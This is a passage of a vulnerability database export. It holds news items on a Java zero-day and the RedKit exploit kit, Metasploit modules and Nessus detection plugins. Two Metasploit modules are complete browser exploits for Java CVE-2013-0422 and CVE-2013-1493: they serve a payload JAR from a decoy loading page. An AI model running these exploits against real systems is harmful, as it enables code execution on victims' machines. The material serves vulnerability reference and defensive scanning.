to fix a malicious bug that allowed hackers access to users web browsers. Exploits for the [previously undisclosed flaw were](<https://thehackernews.com/2013/01/exploit-packs-updated-with-new-java.html>) being hosted in a number of [exploit kits](<https://thehackernews.com/2012/09/blackhole-exploit-kit-20-released-with.html>) and attacks have already been seen in the wild dropping ransomware and assorted other malware.\n\n \n\n\nSecurity Alert [CVE-2013-0422](<https://www.oracle.com/technetwork/topics/security/alert-cve-2013-0422-1896849.html>) include two [vulnerabilities](<https://thehackernews.com/2012/12/hunting-vulnerabilities-in-scada.html>) that are remotely executable. 
Oracle confirmed that the flaws were only present in Java 7 versions and did not impact Java on servers, Java desktop applications, or embedded Java.\n\n \n \n\n\nJava is used in 3 billion machines, about 2 billion of which are desktop or laptop computers. Similarly, Back in August last year, Oracle issued an urgent fix to seal a dangerous security flaw within its Java software that's left thousands of computers wide open to malicious attacks from hackers.\n\n \n\n\n**_Lamar Bailey_**, director of security research and development for [nCircle](<https://www.ncircle.com/>) said, \"_We're just two weeks into 2013 and already we've seen a surge of critical vulnerabilities and emergency patches. Oracle just added 86 new fixes to overloaded IT teams already struggling to keep up with emergency patches for Java, Internet Explorer and Ruby on Rails._ \n_ \n_ _No matter how far behind IT teams are, they can't afford to ignore this massive Oracle patch. Oracle Mobile Server has two CVEs that have a CVSS score of ten, that's as bad as it gets. There are also two MySQL vulnerabilities that can be exploited remotely. All of these should be patched as soon as possible_.\" \n \nJanuary Patch include 86 security updates across all major product lines including [Oracle Database](<https://thehackernews.com/2012/05/oracle-database-new-zero-day-exploit.html>) and MySQL Server. 
Patches for a number of Oracle applications were released Tuesday, including nine for Oracle E-Business Suite (7 of which are remotely exploitable), 12 in Oracle PeopleSoft (7 remotely exploitable), 10 in Oracle Siebel CRM (5 remotely exploitable), and one each in Oracle Supply Chain Products Suite and Oracle JD Edwards Products.\n", "cvss3": {}, "published": "2013-01-16T17:01:00", "type": "thn", "title": "Oracle Patches Java Zero Day Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-0422"], "modified": "2013-01-16T17:01:53", "id": "THN:89520BFD362B62FC3AC65D16DFCFDA44", "href": "https://thehackernews.com/2013/01/oracle-patches-java-zero-day.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-11T00:22:22", "description": "**RedKit Exploit Kit** : New web malware exploitation pack \n\n\n[](<https://thehackernews.com/images/-qhaOFk4KkyY/T6WMpVqp5QI/AAAAAAAAGCw/itUPRLy0FxE/s728-e365/RedKit+Exploit+Kit+New+web+malware+exploitation+pack.png>)\n\n \n\n\nTrustwave researchers have spotted a new exploit kit called \"**RedKit Exploit Kit**\" that being used in the wild is aiming to enter a market that is practically monopolized by the widely famous BlackHole and Phoenix exploit kits.\n\n \n\n\nIn actual, The new kit has no official name, so the researchers dubbed it '**Redkit**' due to the red bordering used in the application's panel.\n\n \n\n\n\"_**Logging to the admin panel presents you with options which are typically used by other exploit 
kits. The panel allows you to check the statistics for incoming traffic, upload a payload executable and even scan this payload with no less than 37 different AV's**_,\" Trustwave [reports](<https://blog.spiderlabs.com/2012/05/a-wild-exploit-kit-appears.html>).\n\n \n\n\nTo deliver the malware, RedKit exploits two popular bugs:\n\n**1.)** The Adobe Acrobat and Reader LibTIFF vulnerability ([CVE-2010-0188](<https://vulners.com/cve/CVE-2010-0188>)).\n\n**2.)** The Java AtomicReferenceArray vulnerability ([CVE-2012-0507](<https://vulners.com/cve/CVE-2012-0507>)), lately used by the criminals behind the massive Flashback infection.\n\n[](<https://thehackernews.com/images/-A8BHujRUats/T6WN-4ajjFI/AAAAAAAAGC4/gZveQvkr1V0/s728-e365/av.png>)\n\n \n\n\n\"**_As each malicious URL gets blocked by most security firms after 24 to 48 hours, the Redkit's author have provide a new API which will produce a fresh URL every hour, so that customer of this exploit kit can now set up an automated process for updating the traffic sources every hour or so to point to the new URL._**\"\n", "cvss3": {}, "published": "2012-05-05T20:31:00", "type": "thn", "title": "RedKit Exploit Kit : New web malware exploitation pack", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-0188", "CVE-2012-0507"], "modified": "2012-10-08T20:49:26", "id": "THN:66B3577F27CF69B6725ED86CD3853632", "href": "https://thehackernews.com/2012/05/redkit-exploit-kit-new-web-malware.html", "cvss": {"score": 10.0, "vector": 
"AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "metasploit": [{"lastseen": "2023-06-05T15:51:45", "description": "This module searches for CVE-2011-3402 (Duqu) related registry artifacts.\n", "cvss3": {}, "published": "2011-11-10T21:20:48", "type": "metasploit", "title": "Windows Gather Forensics Duqu Registry Check", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-3402"], "modified": "2023-02-08T13:47:34", "id": "MSF:POST-WINDOWS-GATHER-FORENSICS-DUQU_CHECK-", "href": "https://www.rapid7.com/db/modules/post/windows/gather/forensics/duqu_check/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Post\n include Msf::Post::Windows::Registry\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Windows Gather Forensics Duqu Registry Check',\n 'Description' => %q{ This module searches for CVE-2011-3402 (Duqu) related registry artifacts.},\n 'License' => MSF_LICENSE,\n 'Author' => [ 'Marcus J. 
Carey <mjc[at]threatagent.com>'],\n 'Platform' => [ 'win' ],\n 'SessionTypes' => [ 'meterpreter' ],\n 'References' => [\n [ 'CVE', '2011-3402' ],\n [ 'URL', 'http://r-7.co/w5h7fY' ]\n ]\n )\n )\n end\n\n def run\n # Registry artifacts sourced from Symantec report\n artifacts =\n [\n 'HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\\"CFID\"',\n 'HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\CFID',\n 'HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\JmiNET3',\n 'HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\JmiNET3\\FILTER'\n ]\n match = 0\n\n print_status(\"Searching registry on #{sysinfo['Computer']} for CVE-2011-3402 exploitation [Duqu] artifacts.\")\n\n begin\n artifacts.each do |artifact|\n (path, query) = parse_path(artifact)\n has_key = registry_enumkeys(path)\n has_val = registry_enumvals(path)\n\n next unless has_key.include?(query) || has_val.include?(query)\n\n print_good(\"#{sysinfo['Computer']}: #{path}\\\\#{query} found in registry.\")\n match += 1\n report_vuln(\n host: session.session_host,\n name: name,\n info: \"Module #{fullname} detected #{path}\\\\#{query} - possible CVE-2011-3402 exploitation [Duqu] artifact.\",\n refs: references,\n exploited_at: Time.now.utc\n )\n end\n rescue StandardError # Probably should do something here...\n end\n\n print_status(\"#{sysinfo['Computer']}: #{match} artifact(s) found in registry.\")\n end\n\n def parse_path(artifact)\n parts = artifact.split('\\\\')\n query = parts[-1]\n parts.pop\n path = parts.join('\\\\')\n return path, query\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/post/windows/gather/forensics/duqu_check.rb", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-11-03T07:23:27", "description": "This module abuses the JMX classes from a Java Applet to run arbitrary Java code outside of the sandbox as 
exploited in the wild in January of 2013. The vulnerability affects Java version 7u10 and earlier.\n", "cvss3": {}, "published": "2013-01-10T19:30:43", "type": "metasploit", "title": "Java Applet JMX Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2013-0422"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT-MULTI-BROWSER-JAVA_JRE17_JMXBEAN-", "href": "https://www.rapid7.com/db/modules/exploit/multi/browser/java_jre17_jmxbean/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::EXE\n\n include Msf::Exploit::Remote::BrowserAutopwn\n autopwn_info({ :javascript => false })\n\n def initialize( info = {} )\n\n super( update_info( info,\n 'Name' => 'Java Applet JMX Remote Code Execution',\n 'Description' => %q{\n This module abuses the JMX classes from a Java Applet to run arbitrary Java\n code outside of the sandbox as exploited in the wild in January of 2013. The\n vulnerability affects Java version 7u10 and earlier.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown', # Vulnerability discovery\n 'egypt', # Metasploit module\n 'sinn3r', # Metasploit module\n 'juan vazquez' # Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-0422' ],\n [ 'OSVDB', '89059' ],\n [ 'US-CERT-VU', '625617' ],\n [ 'URL', 'http://malware.dontneedcoffee.com/2013/01/0-day-17u10-spotted-in-while-disable.html' ],\n [ 'URL', 'http://labs.alienvault.com/labs/index.php/2013/new-year-new-java-zeroday/' ],\n [ 'URL', 'http://pastebin.com/cUG2ayjh' ] #Who authored the code on pastebin? 
I can't read Russian :-(\n ],\n 'Platform' => %w{ java linux osx win },\n 'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },\n 'Targets' =>\n [\n [ 'Generic (Java Payload)',\n {\n 'Platform' => ['java'],\n 'Arch' => ARCH_JAVA,\n }\n ],\n [ 'Windows x86 (Native Payload)',\n {\n 'Platform' => 'win',\n 'Arch' => ARCH_X86,\n }\n ],\n [ 'Mac OS X x86 (Native Payload)',\n {\n 'Platform' => 'osx',\n 'Arch' => ARCH_X86,\n }\n ],\n [ 'Linux x86 (Native Payload)',\n {\n 'Platform' => 'linux',\n 'Arch' => ARCH_X86,\n }\n ],\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => '2013-01-10'\n ))\n end\n\n\n def setup\n path = File.join(Msf::Config.data_directory, \"exploits\", \"cve-2013-0422\", \"Exploit.class\")\n @exploit_class = File.open(path, \"rb\") {|fd| fd.read(fd.stat.size) }\n path = File.join(Msf::Config.data_directory, \"exploits\", \"cve-2013-0422\", \"B.class\")\n @loader_class = File.open(path, \"rb\") {|fd| fd.read(fd.stat.size) }\n\n @exploit_class_name = rand_text_alpha(\"Exploit\".length)\n @exploit_class.gsub!(\"Exploit\", @exploit_class_name)\n super\n end\n\n def on_request_uri(cli, request)\n print_status(\"handling request for #{request.uri}\")\n\n case request.uri\n when /\\.jar$/i\n jar = payload.encoded_jar\n jar.add_file(\"#{@exploit_class_name}.class\", @exploit_class)\n jar.add_file(\"B.class\", @loader_class)\n metasploit_str = rand_text_alpha(\"metasploit\".length)\n payload_str = rand_text_alpha(\"payload\".length)\n jar.entries.each { |entry|\n entry.name.gsub!(\"metasploit\", metasploit_str)\n entry.name.gsub!(\"Payload\", payload_str)\n entry.data = entry.data.gsub(\"metasploit\", metasploit_str)\n entry.data = entry.data.gsub(\"Payload\", payload_str)\n }\n jar.build_manifest\n\n send_response(cli, jar, { 'Content-Type' => \"application/octet-stream\" })\n when /\\/$/\n payload = regenerate_payload(cli)\n if not payload\n print_error(\"Failed to generate the payload.\")\n send_not_found(cli)\n return\n end\n 
send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })\n else\n send_redirect(cli, get_resource() + '/', '')\n end\n\n end\n\n def generate_html\n html = %Q|<html><head><title>Loading, Please Wait...</title></head>|\n html += %Q|<body><center><p>Loading, Please Wait...</p></center>|\n html += %Q|<applet archive=\"#{rand_text_alpha(8)}.jar\" code=\"#{@exploit_class_name}.class\" width=\"1\" height=\"1\">|\n html += %Q|</applet></body></html>|\n return html\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/browser/java_jre17_jmxbean.rb", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-11-04T04:43:15", "description": "This module abuses the Color Management classes from a Java Applet to run arbitrary Java code outside of the sandbox as exploited in the wild in February and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41 and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1 systems. 
This exploit doesn't bypass click-to-play, so the user must accept the java warning in order to run the malicious applet.\n", "cvss3": {}, "published": "2013-03-26T21:30:18", "type": "metasploit", "title": "Java CMM Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2013-1493"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT-WINDOWS-BROWSER-JAVA_CMM-", "href": "https://www.rapid7.com/db/modules/exploit/windows/browser/java_cmm/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::EXE\n\n #include Msf::Exploit::Remote::BrowserAutopwn\n #autopwn_info({ :javascript => false })\n\n def initialize( info = {} )\n\n super( update_info( info,\n 'Name' => 'Java CMM Remote Code Execution',\n 'Description' => %q{\n This module abuses the Color Management classes from a Java Applet to run\n arbitrary Java code outside of the sandbox as exploited in the wild in February\n and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41\n and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1\n systems. 
This exploit doesn't bypass click-to-play, so the user must accept the java\n warning in order to run the malicious applet.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown', # Vulnerability discovery and Exploit\n 'juan vazquez' # Metasploit module (just ported the published exploit)\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1493' ],\n [ 'OSVDB', '90737' ],\n [ 'BID', '58238' ],\n [ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],\n [ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],\n [ 'URL', 'http://pastie.org/pastes/6581034' ]\n ],\n 'Platform' => %w{ java win },\n 'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },\n 'Targets' =>\n [\n [ 'Generic (Java Payload)',\n {\n 'Platform' => 'java',\n 'Arch' => ARCH_JAVA\n }\n ],\n [ 'Windows x86 (Native Payload)',\n {\n 'Platform' => 'win',\n 'Arch' => ARCH_X86\n }\n ]\n ],\n 'DefaultTarget' => 1,\n 'DisclosureDate' => '2013-03-01'\n ))\n end\n\n\n def setup\n path = File.join(Msf::Config.data_directory, \"exploits\", \"cve-2013-1493\", \"Init.class\")\n @init_class = File.open(path, \"rb\") {|fd| fd.read(fd.stat.size) }\n path = File.join(Msf::Config.data_directory, \"exploits\", \"cve-2013-1493\", \"Leak.class\")\n @leak_class = File.open(path, \"rb\") {|fd| fd.read(fd.stat.size) }\n path = File.join(Msf::Config.data_directory, \"exploits\", \"cve-2013-1493\", \"MyBufferedImage.class\")\n @buffered_image_class = File.open(path, \"rb\") {|fd| fd.read(fd.stat.size) }\n path = File.join(Msf::Config.data_directory, \"exploits\", \"cve-2013-1493\", \"MyColorSpace.class\")\n @color_space_class = File.open(path, \"rb\") {|fd| fd.read(fd.stat.size) }\n\n @init_class_name = rand_text_alpha(\"Init\".length)\n @init_class.gsub!(\"Init\", @init_class_name)\n super\n end\n\n def on_request_uri(cli, request)\n print_status(\"handling request for #{request.uri}\")\n\n case request.uri\n when /\\.jar$/i\n jar = 
payload.encoded_jar\n jar.add_file(\"#{@init_class_name}.class\", @init_class)\n jar.add_file(\"Leak.class\", @leak_class)\n jar.add_file(\"MyBufferedImage.class\", @buffered_image_class)\n jar.add_file(\"MyColorSpace.class\", @color_space_class)\n metasploit_str = rand_text_alpha(\"metasploit\".length)\n payload_str = rand_text_alpha(\"payload\".length)\n jar.entries.each { |entry|\n entry.name.gsub!(\"metasploit\", metasploit_str)\n entry.name.gsub!(\"Payload\", payload_str)\n entry.data = entry.data.gsub(\"metasploit\", metasploit_str)\n entry.data = entry.data.gsub(\"Payload\", payload_str)\n }\n jar.build_manifest\n\n send_response(cli, jar, { 'Content-Type' => \"application/octet-stream\" })\n when /\\/$/\n payload = regenerate_payload(cli)\n if not payload\n print_error(\"Failed to generate the payload.\")\n send_not_found(cli)\n return\n end\n send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })\n else\n send_redirect(cli, get_resource() + '/', '')\n end\n\n end\n\n def generate_html\n html = %Q|<html><head><title>Loading, Please Wait...</title></head>|\n html += %Q|<body><center><p>Loading, Please Wait...</p></center>|\n html += %Q|<applet archive=\"#{rand_text_alpha(8)}.jar\" code=\"#{@init_class_name}.class\" width=\"1\" height=\"1\">|\n html += %Q|</applet></body></html>|\n return html\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/browser/java_cmm.rb", "cvss": {"score": 0.0, "vector": "NONE"}}], "nessus": [{"lastseen": "2023-05-18T14:24:10", "description": "The remote host has an unspecified code execution vulnerability in the Win32k TrueType font parsing engine. Specially crafted TrueType fonts are not properly handled, which could allow arbitrary code execution in kernel mode. A remote attacker could exploit this vulnerability by tricking a user into viewing a specially crafted TrueType font (e.g., via web or email). 
\n\nThis vulnerability is reportedly exploited by the Duqu malware and is being exploited in the wild.\n\nNote that this plugin has been deprecated on December 13, 2011 with the publication by Microsoft of MS11-087.", "cvss3": {}, "published": "2011-11-04T00:00:00", "type": "nessus", "title": "MS KB2639658: Vulnerability in TrueType Font Parsing Could Allow Elevation of Privilege (DEPRECATED)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3402"], "modified": "2017-08-30T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_KB2639658.NASL", "href": "https://www.tenable.com/plugins/nessus/56711", "sourceData": "#%NASL_MIN_LEVEL 999999\n\n#\n# (C) Tenable Network Security, Inc.\n#\n\n# @DEPRECATED@\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(56711);\n script_version(\"1.14\");\n script_cvs_date(\"Date: 2018/07/27 18:38:15\");\n\n script_cve_id(\"CVE-2011-3402\");\n script_bugtraq_id(50462);\n script_xref(name:\"CERT\", value:\"316553\");\n script_xref(name:\"MSKB\", value:\"2639658\");\n\n script_name(english:\"MS KB2639658: Vulnerability in TrueType Font Parsing Could Allow Elevation of Privilege (DEPRECATED)\");\n script_summary(english:\"Checks permissions on t2embed.dll\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Windows host has a code execution vulnerability in its\nfont parsing engine.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The remote host has an unspecified code execution vulnerability in\nthe Win32k TrueType font parsing engine. Specially crafted TrueType\nfonts are not properly handled, which could allow arbitrary code\nexecution in kernel mode. A remote attacker could exploit this\nvulnerability by tricking a user into viewing a specially crafted\nTrueType font (e.g., via web or email). 
\n\nThis vulnerability is reportedly exploited by the Duqu malware and is\nbeing exploited in the wild.\n\nNote that this plugin has been deprecated on December 13, 2011 with\nthe publication by Microsoft of MS11-087.\"\n );\n script_set_attribute(attribute:\"see_also\",value:\"http://www.crysys.hu/\");\n script_set_attribute(attribute:\"see_also\",value:\"http://www.symantec.com/connect/w32_duqu_precursor_next_stuxnet\");\n # http://www.symantec.com/connect/w32-duqu_status-updates_installer-zero-day-exploit\n script_set_attribute(attribute:\"see_also\",value:\"http://www.nessus.org/u?70696c53\");\n script_set_attribute(attribute:\"see_also\",value:\"http://technet.microsoft.com/en-us/security/advisory/2639658\");\n script_set_attribute(attribute:\"see_also\",value:\"http://support.microsoft.com/kb/2639658\");\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Apply the workaround referenced in Microsoft Security Advisory\n(2639658). This workaround may cause some fonts to display\nimproperly. 
Refer to the advisory for more information.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:TF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/11/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/11/04\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2011-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_hotfixes.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\", \"SMB/WindowsVersion\", \"SMB/ARCH\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\n# This script has been disabled and is intended to be blank.\n# Disabled on 2011/12/23. Deprecated by smb_nt_ms11-087.nasl.\nexit(0, \"Deprecated - replaced by smb_nt_ms11-087.nasl\");\n\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"misc_func.inc\");\n\nACCESS_DENIED_ACE_TYPE = 1; # this should probably be put into an include file\n\n##\n# Opens the given file. 
Assumes an absolute path will be given and\n# the caller has already connected to the appropriate share.\n#\n# @anonparam path pathname of the file to open\n#\n# @return file handle for 'path' if it exists could be opened,\n# NULL otherwise\n##\nfunction open_file()\n{\n local_var path, fh;\n path = substr(_FCT_ANON_ARGS[0], 2); # strip leading drive information\n\n fh = CreateFile(\n file:path,\n desired_access:GENERIC_READ,\n file_attributes:FILE_ATTRIBUTE_NORMAL,\n share_mode:FILE_SHARE_READ,\n create_disposition:OPEN_EXISTING\n );\n\n return fh;\n}\n\n##\n# Gets the DACL of the given file\n#\n# @anonparam fh handle of the file to obtain the DACL for\n#\n# @return DACL associated with 'fh'\n##\nfunction get_dacl()\n{\n local_var fh, sd, dacl;\n fh = _FCT_ANON_ARGS[0];\n\n sd = GetSecurityInfo(handle:fh, level:DACL_SECURITY_INFORMATION);\n if (isnull(sd))\n {\n debug_print(\"Unable to access security descriptor.\");\n return NULL;\n }\n \n dacl = sd[3];\n if (isnull(dacl))\n {\n debug_print(\"Unable to retrieve DACL.\");\n return NULL;\n }\n \n dacl = parse_pdacl(blob:dacl);\n if (isnull(dacl))\n {\n debug_print(\"Error parsing DACL.\");\n return NULL;\n }\n\n return dacl;\n}\n\n##\n# Checks the permissions of the given file to see if the workaround\n# from MS KB2639658 is being used\n#\n# @anonparam path pathname of the file to check\n#\n# @return TRUE if the file exists and the workaround is not in place,\n# FALSE otherwise\n##\nfunction workaround_missing()\n{\n local_var path, fh, dacl, ace, sid, rights, type;\n path = _FCT_ANON_ARGS[0];\n\n fh = open_file(path);\n if (isnull(fh))\n {\n debug_print('Unable to open ' + path);\n return FALSE;\n }\n\n dacl = get_dacl(fh);\n CloseFile(handle:fh);\n if (isnull(dacl))\n {\n debug_print('Unable to get DACL for ' + path);\n return FALSE;\n }\n\n foreach ace (dacl)\n {\n ace = parse_dacl(blob:ace);\n if (isnull(ace))\n {\n debug_print(\"Error parsing ACE.\");\n continue;\n }\n \n rights = ace[0];\n type = ace[3];\n 
sid = sid2string(sid:ace[1]);\n if (isnull(sid))\n {\n debug_print(1, \"Error parsing SID.\");\n continue;\n }\n \n # Explicitly check for the workaround:\n # a 1) an deny ACE 2) for Everyone 3) for full access\n if (\n type == ACCESS_DENIED_ACE_TYPE &&\n sid == '1-1-0' &&\n rights & FILE_ALL_ACCESS == FILE_ALL_ACCESS\n )\n {\n return FALSE; # workaround exists, therefore workaround_missing is FALSE\n }\n }\n \n return TRUE; # if the ACE created by the workaround wasn't seen, the workaround is missing\n}\n \nget_kb_item_or_exit('SMB/WindowsVersion');\nif (hotfix_check_sp(xp:4, win2003:3, vista:3, win7:2) <= 0) exit(0, 'Host is not affected based on its version / service pack.');\nif (hotfix_check_server_core() == 1) exit(0, \"Windows Server Core installs are not affected.\");\n\narch = get_kb_item_or_exit('SMB/ARCH');\nroot = hotfix_get_systemroot();\npaths = NULL;\n\nif (hotfix_check_sp(xp:4, win2003:3) > 0)\n{\n # For 32-bit systems, enter the following command at an administrative command prompt:\n # Echo y| cacls \"%windir%\\system32\\t2embed.dll\" /E /P everyone:N\n if (arch == 'x86')\n paths = make_list(root + \"\\system32\\t2embed.dll\");\n\n # For 64-bit systems, enter the following command from an administrative command prompt:\n # Echo y| cacls \"%windir%\\system32\\t2embed.dll\" /E /P everyone:N\n # Echo y| cacls \"%windir%\\syswow64\\t2embed.dll\" /E /P everyone:N\n if (arch == 'x64')\n paths = make_list(root + \"\\system32\\t2embed.dll\", root + \"\\syswow64\\t2embed.dll\");\n}\nelse if (hotfix_check_sp(vista:3, win7:2) > 0)\n{\n # For 32-bit systems, enter the following command at an administrative command prompt:\n # Takeown.exe /f \"%windir%\\system32\\t2embed.dll\"\n # Icacls.exe \"%windir%\\system32\\t2embed.dll\" /deny everyone:(F)\n if (arch == 'x86')\n paths = make_list(root + \"\\system32\\t2embed.dll\");\n\n # For 64-bit systems, enter the following command at an administrative command prompt:\n # Takeown.exe /f 
\"%windir%\\system32\\t2embed.dll\"\n # Icacls.exe \"%windir%\\system32\\t2embed.dll\" /deny everyone:(F)\n # Takeown.exe /f \"%windir%\\syswow64\\t2embed.dll\"\n # Icacls.exe \"%windir%\\syswow64\\t2embed.dll\" /deny everyone:(F)\n if (arch == 'x64')\n paths = make_list(root + \"\\system32\\t2embed.dll\", root + \"\\syswow64\\t2embed.dll\");\n}\n\nif (isnull(paths))\n exit(0, 'The version of Windows installed on this host doesn\\'t appear to be affected.');\n\nshare = ereg_replace(pattern:\"^([A-Za-z]):.*\", replace:\"\\1$\", string:root);\nname = kb_smb_name();\nlogin = kb_smb_login();\npass = kb_smb_password();\ndomain = kb_smb_domain();\nport = kb_smb_transport();\n\nif (!get_port_state(port))exit(1, \"Port \"+port+\" is not open.\");\n\nsoc = open_sock_tcp(port);\nif (!soc)exit(1, \"Failed to open a socket on port \"+port+\".\");\n\nsession_init(socket:soc, hostname:name);\nr = NetUseAdd(login:login, password:pass, domain:domain, share:share);\nif ( r != 1 )\n{\n NetUseDel();\n exit(1, \"Unable to access the '\" + share + \"' share.\");\n}\n\nvuln_paths = make_list();\n\nforeach path (paths)\n{\n if (workaround_missing(path))\n vuln_paths = make_list(vuln_paths, path);\n} \n\nNetUseDel();\n\nif (max_index(vuln_paths) == 0)\n{\n exit(0, 'The host is not affected.');\n}\nelse\n{\n if (max_index(vuln_paths) == 1) s = ' has';\n else s = 's have';\n\n report = '\\nThe following file' + s + ' not been modified by the workaround :\\n\\n' + join(vuln_paths, sep:'\\n') + '\\n';\n security_hole(port:port, extra:report);\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:24:44", "description": "The remote host is running a version of the Windows kernel that is affected by a remote code execution vulnerability. Specially crafted TrueType fonts are not properly handled, which could allow arbitrary code execution in kernel mode. 
A remote attacker could exploit this vulnerability by tricking a user into viewing a specially crafted TrueType font (e.g., via web or email).\n\nThis vulnerability is reportedly being exploited in the wild by the Duqu malware.", "cvss3": {}, "published": "2011-12-13T00:00:00", "type": "nessus", "title": "MS11-087: Vulnerability in Windows Kernel-Mode Drivers Could Allow Remote Code Execution (2639417)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3402"], "modified": "2018-11-15T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS11-087.NASL", "href": "https://www.tenable.com/plugins/nessus/57273", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(57273);\n script_version(\"1.23\");\n script_cvs_date(\"Date: 2018/11/15 20:50:31\");\n\n script_cve_id(\"CVE-2011-3402\");\n script_bugtraq_id(50462);\n script_xref(name:\"CERT\", value:\"316553\");\n script_xref(name:\"MSFT\", value:\"MS11-087\");\n script_xref(name:\"MSKB\", value:\"2639417\");\n\n script_name(english:\"MS11-087: Vulnerability in Windows 